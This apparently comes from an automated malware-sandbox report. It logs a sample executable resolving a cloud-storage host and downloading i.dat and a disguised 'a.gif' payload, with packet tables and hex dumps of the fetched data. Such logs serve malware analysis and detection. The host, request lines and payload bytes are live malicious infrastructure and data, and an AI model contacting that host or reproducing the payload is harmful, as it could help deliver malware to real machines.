Jan 12, 2025 04:06:04.624089956 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.624140978 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.710124969 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.710237026 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.710264921 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.710273027 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.710335016 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.710390091 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.710396051 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.710432053 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.710458994 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.710465908 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.710516930 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.710567951 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.710573912 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.710650921 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.710660934 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.710766077 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.734312057 CET | 49982 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.734323025 CET | 443 | 49982 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.765898943 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.765955925 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:04.766074896 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.766369104 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:04.766382933 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.105576038 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.106004000 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.106362104 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.106381893 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.106569052 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.106583118 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.460696936 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.460751057 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.460788965 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.460803986 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.460844994 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.460844994 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.461275101 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.461402893 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.462363958 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.462474108 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.466875076 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.467086077 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.551017046 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.551182032 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.551601887 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.551671028 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.551965952 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.552067995 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.552591085 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.552661896 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.552685976 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.552757025 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.553715944 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.553805113 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.555506945 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.555577993 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.555840969 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.555900097 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.557796001 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.557862043 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.641628027 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.641768932 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.641769886 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.641798973 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.641844034 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.641844034 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.642090082 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.642193079 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.642210007 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.642218113 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.642275095 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.642275095 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.642719030 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.642807007 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.642811060 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.642832994 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.642865896 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.643069983 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.643419981 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.643512964 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.643567085 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.643567085 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.643573046 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.643598080 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.643625021 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
Jan 12, 2025 04:06:06.643630028 CET | 443 | 49983 | 47.101.26.25 | 192.168.2.5
Jan 12, 2025 04:06:06.643656015 CET | 49983 | 443 | 192.168.2.5 | 47.101.26.25
                                    Jan 12, 2025 04:06:06.643697977 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.644339085 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.644412994 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.644448042 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.644516945 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.644532919 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.644643068 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.644643068 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.644665956 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.644706964 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.644706964 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.645967960 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.646250010 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.648142099 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.648219109 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.648226976 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.648240089 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.648284912 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.648284912 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.732367992 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.732481003 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.732485056 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.732502937 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.732553005 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.732553005 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.732563972 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.732646942 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.732656002 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.732712984 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.747618914 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.747634888 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.774049044 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.774075985 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.774306059 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.774444103 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.774460077 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.100358009 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.100459099 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.101094007 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.101094007 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.101105928 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.101120949 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.480724096 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.480778933 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.480834007 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.480849028 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.480911016 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.480911016 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.481077909 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.481170893 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.482630968 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.482708931 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.482722998 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.482769966 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.482790947 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.482841969 CET49984443192.168.2.547.101.26.25
                                     Timestamp                            Source Port  Dest Port  Source IP     Dest IP
                                     Jan 12, 2025 04:06:00.148108006 CET        53823         53  192.168.2.5   1.1.1.1
                                     Jan 12, 2025 04:06:00.716351032 CET           53      53823  1.1.1.1       192.168.2.5
                                     Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                                 Type            Class        DNS over HTTPS
                                     Jan 12, 2025 04:06:00.148108006 CET  192.168.2.5  1.1.1.1  0x3aea    Standard query (0)  jcoiw1.oss-cn-shanghai.aliyuncs.com  A (IP address)  IN (0x0001)  false
                                     Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                                                          CName                                                         Address       Type                    Class        DNS over HTTPS
                                     Jan 12, 2025 04:06:00.716351032 CET  1.1.1.1    192.168.2.5  0x3aea    No error (0)  jcoiw1.oss-cn-shanghai.aliyuncs.com                           sc-2wln.cn-shanghai.oss-adns.aliyuncs.com                     -             CNAME (Canonical name)  IN (0x0001)  false
                                     Jan 12, 2025 04:06:00.716351032 CET  1.1.1.1    192.168.2.5  0x3aea    No error (0)  sc-2wln.cn-shanghai.oss-adns.aliyuncs.com                     sc-2wln.cn-shanghai.oss-adns.aliyuncs.com.gds.alibabadns.com  -             CNAME (Canonical name)  IN (0x0001)  false
                                     Jan 12, 2025 04:06:00.716351032 CET  1.1.1.1    192.168.2.5  0x3aea    No error (0)  sc-2wln.cn-shanghai.oss-adns.aliyuncs.com.gds.alibabadns.com  -                                                             47.101.26.25  A (IP address)          IN (0x0001)  false
                                    • jcoiw1.oss-cn-shanghai.aliyuncs.com
                                     Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                     0           192.168.2.5  49981        47.101.26.25    443               6504  C:\Users\user\Desktop\1387457-38765948.15.exe
                                     Timestamp                Bytes transferred  Direction  Data
                                     2025-01-12 03:06:02 UTC  107                OUT        GET /i.dat HTTP/1.1
                                    User-Agent: 3M
                                    Host: jcoiw1.oss-cn-shanghai.aliyuncs.com
                                    Cache-Control: no-cache
                                     2025-01-12 03:06:02 UTC  558                IN         HTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Sun, 12 Jan 2025 03:06:02 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 512
                                    Connection: close
                                    x-oss-request-id: 6783319A2E2F7835342EDFD1
                                    Accept-Ranges: bytes
                                    ETag: "FF6D9354842B497B290F2E5509598F49"
                                    Last-Modified: Sat, 11 Jan 2025 10:54:12 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 12504110949063718454
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000113
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: /22TVIQrSXspDy5VCVmPSQ==
                                    x-oss-server-time: 3
                                    2025-01-12 03:06:02 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 5a 53 5f 59 2e 68 77 36 45 45 1b 55 3b 78 26 3d 5c 53 5a 55 34 3c 7b 34 58 5d 4d 41 2f 22 32 6f 0c 00 02 40 21 6e 27 29 4f 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 41 5d 5d 59 2a 63 76 76 1c 15 19 1f 68 2e 31 70 03 03 5d 13 7d 3e 60 7b 1a 15 1c 13 72 7a 3d 72 1e 1b 0b 07 69 64 74 29 4a 46 44 06 64 28 61 6f 09 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 07 1b 1b 1f 6c 25 30 30 5a 53 5f 59 2e 68 77 36 45 45 1b 55 3b 78 26 3d 5c 53 5a 55 34 3c 7b 34 58 5d 4d 41 2f 22 32 6f 0c 00 02 40 23 6e 27 29 4f 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 41 5d 5d 59 2a 63 76 76 1c 15 19 1f 68 2e 31
                                    Data Ascii: l%00ZS_Y.hw6EEU;x&=\SZU4<{4X]MA/"2o@!n')O)))))))))))))))))))))))))))))))A]]Y*cvvh.1p]}>`{rz=ridt)JFDd(aooooooooooooooooooooooooooooooool%00ZS_Y.hw6EEU;x&=\SZU4<{4X]MA/"2o@#n')O)))))))))))))))))))))))))))))))A]]Y*cvvh.1


                                     Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                     1           192.168.2.5  49982        47.101.26.25    443               6504  C:\Users\user\Desktop\1387457-38765948.15.exe
                                     Timestamp                Bytes transferred  Direction  Data
                                     2025-01-12 03:06:04 UTC  107                OUT        GET /a.gif HTTP/1.1
                                    User-Agent: 3M
                                    Host: jcoiw1.oss-cn-shanghai.aliyuncs.com
                                    Cache-Control: no-cache
                                     2025-01-12 03:06:04 UTC  545                IN         HTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Sun, 12 Jan 2025 03:06:04 GMT
                                    Content-Type: image/gif
                                    Content-Length: 135589
                                    Connection: close
                                    x-oss-request-id: 6783319C5C5A72323020629F
                                    Accept-Ranges: bytes
                                    ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                    Last-Modified: Sat, 11 Jan 2025 10:53:19 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 8642451798640735006
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000103
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                    x-oss-server-time: 1
                                    2025-01-12 03:06:04 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                    2025-01-12 03:06:04 UTC4096INData Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87
                                    Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                    2025-01-12 03:06:04 UTC4096INData Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92
                                    Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                    2025-01-12 03:06:04 UTC4096INData Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea
                                    Data Ascii: c}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                    2025-01-12 03:06:04 UTC4096INData Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55
                                    Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
                                    2025-01-12 03:06:04 UTC4096INData Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92
                                    Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                    2025-01-12 03:06:04 UTC4096INData Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17
                                    Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
